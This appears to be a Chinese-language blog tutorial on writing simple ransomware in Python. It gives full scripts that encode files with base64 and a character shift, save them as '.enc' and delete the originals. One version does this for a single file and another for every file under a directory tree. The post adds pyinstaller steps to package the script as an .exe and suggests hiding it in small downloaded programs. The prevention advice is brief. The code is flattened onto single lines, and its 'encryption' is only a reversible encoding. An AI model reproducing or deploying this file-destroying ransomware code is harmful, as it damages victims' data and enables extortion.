【Python】勒索病毒模拟

| 警告：仅供参考学习，不得做违法的事！免责声明：本文仅仅只是展示攻击手段，提高防范意识。任何由于该文章产生的消极后果与本作者无关。

简介

勒索病毒能将电脑上的一些重要文件进行数据加密，将文件以二进制的形式进行加密处理，导致无法成功打开加密后的文件，要打开必须要解密，要解密必须要解密程序，从而让我们能够进行勒索。

勒索病毒的原理不难，简单来说就是对数据的加密，而解密的办法一般只有我们自己知道，接下去就让我们来编写一些简单的勒索病毒吧！

前言

勒索病毒更多情况下是.exe的可执行文件，一般情况下都是由编译型语言编写后编译形成。由于python属于解释性语言，无法直接生成可执行文件，所以我们可以安装使用 pyinstaller 模块，将 py 文件打包为 exe 文件执行。下面附上 pyinstaller 基础用法。

# 安装包
pip3 install pyinstaller# 进入 .py 文件所在目录，cmd执行如下命令，即可完成打包，更多内容请自行搜索
pyinstaller [...].py

开始编写

这里我们的勒索病毒是基于base64实现的，当然还可以使用别的方法，原理都是一样的。

下面就是攻击脚本全貌，照着注释食用。

对单个文件进行加密

# 下面这个是对一张图片进行的加密
import base64, os# 加密
def encrypt(filepath):# 打开我们想要加密的文件with open(file=filepath, mode='rb') as f1:data = base64.b64encode(f1.read()).decode()# base64加密后再对所有字符进行ASCII移位，这里选择移动5位content = ''for single_char in data:content += chr(ord(single_char) + 5)# 保存文本并且更改文件后缀with open(file=filepath + '.enc', mode='w') as f2:f2.write(content)# 删除原文件os.remove(filepath)# 解密 不做注释了，反正就是加密逆过来就行
def decrypt(filepath):with open(file=filepath, mode='r') as f1:data = f1.read()content = ''for single_char in data:content += chr(ord(single_char) - 5)new_filepath = filepath.replace('.enc', '')with open(file=new_filepath, mode='wb') as f2:f2.write(base64.b64decode(content.encode()))os.remove(filepath)if __name__ == '__main__':encrypt('file.jpeg')# decrypt('file.jpeg.enc')

对一个目录中的所有文件进行加密

对目录来说，我们先要浅学一下 os.walk() 目录遍历函数（很简单，可上网搜）

import base64, os# 加密
def encrypt(dir_path):filepaths = get_files_from_dir(dir_path)if not filepaths == '':# 打开我们想要加密的文件for filepath in filepaths:with open(file=filepath, mode='rb') as f1:data = base64.b64encode(f1.read()).decode()# base64加密后再对所有字符进行ASCII移位，这里选择移动5位content = ''for single_char in data:content += chr(ord(single_char) + 5)with open(file=filepath + '.enc', mode='w') as f2:f2.write(content)# 删除原文件os.remove(filepath)else:print('目录不存在')# 解密 不做注释了，反正就是加密逆过来就行
def decrypt(dir_path):filepaths = get_files_from_dir(dir_path)if not filepaths == '':for filepath in filepaths:with open(file=filepath, mode='r') as f1:data = f1.read()content = ''for single_char in data:content += chr(ord(single_char) - 5)new_filepath = filepath.replace('.enc', '')with open(file=new_filepath, mode='wb') as f2:f2.write(base64.b64decode(content.encode()))os.remove(filepath)else:print('目录不存在')# 目录遍历,返回遍历到的所有文件名
def get_files_from_dir(dir_path):if not os.path.exists(dir_path):return ''file_paths = []for root, directories, files in os.walk(dir_path):for filename in files:filepath = os.path.join(root, filename)file_paths.append(filepath)return file_pathsif __name__ == '__main__':encrypt('123') # 同目录下的一个 123 目录# decrypt('123')

简单试试

对单个文件

加密：

原来的图片：

加密后变成了文本：

解密后，重新回到了照片的形式

对文件夹

加密之前：

加密之后：

攻击猜想

一般情况下，攻击者不会对整个文件进行加密，往往就是文件的一块，以达到快速污染磁盘文件的目的。一般情况下这串病毒代码可能会附着在一些小软件中（.exe），所以非官方途径的下载必须要小心，运行之后可能就会对磁盘文件产生污染，而且有的针对性的勒索病毒还不容易被查杀，就如上面的代码，可能在电脑看来都是非常正常的程序，但是却会产生很大的破坏力。

防范

少下非官方途径的文件
如果真的被感染，要迅速断电，防止更多文件被污染（一般情况下）